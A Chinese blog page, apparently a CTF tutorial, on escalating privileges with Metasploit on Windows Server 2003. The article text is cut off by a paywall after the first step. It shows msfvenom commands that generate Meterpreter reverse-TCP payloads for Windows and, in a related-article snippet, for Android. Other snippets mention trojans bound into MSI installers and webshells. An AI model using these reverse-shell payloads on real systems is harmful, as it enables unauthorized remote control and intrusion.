【提权】metasploit提权方法

最新推荐文章于 2023-09-06 15:21:09 发布
最新推荐文章于 2023-09-06 15:21:09 发布
阅读量923 收藏 3
点赞数
分类专栏: CTF 文章标签: shell msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_35938621/article/details/119858943
版权
本文详细介绍了如何使用Metasploit在Windows 2003 Server上进行提权。首先生成攻击载荷,通过msfconsole建立监听。在受害者机器上执行payload获取低权限shell,然后使用Metasploit的multi模块进行提权检查。选择合适的提权模块(如ms14_058),设置session并成功提升到System权限。此外,还分享了一些基本命令的使用记录。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

  • metasploit 提权使用

常用的提权模块

metasploit 提权EXP存储文件夹路径

find / -name metasploit

一般都在
/usr/share/metasploit-framework/modules/exploits/windows/local

windows2003提权

环境:2003 server

1、生成攻击载荷

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=6666 -f exe > payload.exe

image-20210822161830954

最低0.47元/天 解锁文章
48-2 内网渗透 - 利用Metasploit
weixin_43263566的博客
06-19 246
Metasploit是一个开源的安全漏洞检测工具,广泛用于安全和IT专业人士识别、验证和利用安全漏洞,同时也支持专家驱动的安全评估和管理。
简单的Metasploit及cs
最新发布
m0_74326506的博客
07-06 2081
但是因为windows中存在服务控制管理器,当服务启动时,会跟服务控制管理器通信,服务控制管理器如果没收到通信,则会认为服务出现错误,终止进程,因为后门木马文件本质并不是服务,无法和服务控制管理器进行通信,所以要么直接上线不了,要么上线一会就下线。在windows中 MSI是微软的安装包格式,他会在后台运行.exe,并以system限启动安装,如果制作一个MSI安装包绑定生成的后门木马,只要win7点击安装,则会以system上线msf,制作MSI安装包可以在网上找。
学习之旅——利用Metasploit
Lemon's blog
08-16 778
1
Metasploit
weixin_44110913的博客
08-02 1020
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 文章目录内核漏洞enum_patches模块Windows-Exploit-suggesterWindows C...
Metasploit
weixin_51151498的博客
08-25 400
windows
利用Metasploit进行Linux
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
metasploit下Windows的多种方法
02-25
目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且限不是系统限的前下,使用以下列出的几种方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里已有介绍,这里不再...
Metasploit拿到shell后 低限---
qq_58000413的博客
08-24 1729
下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定。
使用Metasploit对Andorid系统渗透测试——定位拍照发短信
渗透测试
05-13 2354
文章目录前言一、生成攻击载荷二、加载主控端handler总结 前言 使用metasploit对安卓系统渗透测试 一、生成攻击载荷 ┌──(root????kali)-[~] └─# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.113 lport=6666 R> pay2.apk [-] No platform was selected, choosing Msf::Module::Platform::Android f
渗透测试Metasploit框架体验(5.理解MSF后渗透-之
weixin_51803729的博客
02-12 5490
渗透测试Metasploit框架体验(5.理解MSF后渗透-之
metasploit linux (本文仅用于技术讨论与学习,利用此文所供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。)
qq_73628117的博客
09-06 532
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告出了他们的发现。
117.网络安全渗透测试—[升篇15]—[Ubuntu15.04 Metasploit]
qwsn
07-08 3857
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告出了他们的发现。php马: elf马:#msfconsole,开启Metasploit控制台 如下图所示,我们首先上传shellx.php攻击载荷到靶机:
Metasploit中的service_permissions模块进行
技术超强的网络安全平台
09-12 967
该漏洞metasploit上面对应的模块为exploit/windows/local/service_permissions: 如上图,该模块有两个可以设置的选项,其中如果把AGGRESSIVE选项设为“true”,则可以利用目标机器上每一个有该漏洞的服务,设为“false”则在第一次成功后就会停止工作。演示如下: set AutoRunScript migrate -f 别忘了迁移进程哦~~ ...
Metasploit(八)后漏洞的
u010680986的博客
09-12 147
升对资源的访问限,对于一些受保护的资源,或者需要限访问的资源,后,可以进行一些恶意操作。 可以使用自带的minishare小程序,use exploit/windows/http/minishare_get_overflow,输入show options可以查看设置项 RHOST和RPORT是必设项,RHOST设置目标ip,RPORT设置目标端口号,设置成功后,需要选择目标系统类型,可以通过接入获取到的信息进行选择 通过getsystem -h来进行 options里..
Metasploit升全剧终
Fly_鹏程万里
07-06 5750
0×01 引言通常,我们在渗透过程中很有可能只获得了一个系统的Guest或User限。低的限级别将会使我们受到很多的限制,所以必须将访问限从Guset升到User,再到Administrator,最后到SYSTEM级别。渗透的最终目的是获取服务器的最高限,即Windows操作系统中管理员账号的限,或LINUX操作系统中root账户限。限的方式分为两类。纵向:低限角色获得高...
metasploit linux
qq_42307546的博客
04-14 2516
1、简介 Metasploit是一款开源的安全漏洞检测工具,可以帮助`安全和IT专业人士识别安全性问题,验证漏洞的 缓解措施,并管理专家驱动的安全性进行评估,供真正的安全风险情报。这些功能包括智能开发,代 码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告出了他们的发现。 生成shell msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=5555 -f elf > shel
数据库之mysql_UDF
qq_45300786的博客
05-23 1758
UDF 本篇主要讲解udf的原理,同时利用metasploit进行演示。 UDF原理 UDF指的是用户自定义函数,用户可以对数据库所使用的函数进行一个扩展(利用dll文件),从而定制一些符合自己需求的函数,但是同样的,当黑客获取了数据库的root用户的一个限时,即使所在的系统限很低,也可以使用UDF来自定义一个执行系统命令的函数,但是执行限为管理员限,从而可以用来添加管理员账户,远程连接。 这里使用mysql进行复现。 首先我们需要拥有mysql数据库的root限,由于my
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孤桜懶契

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值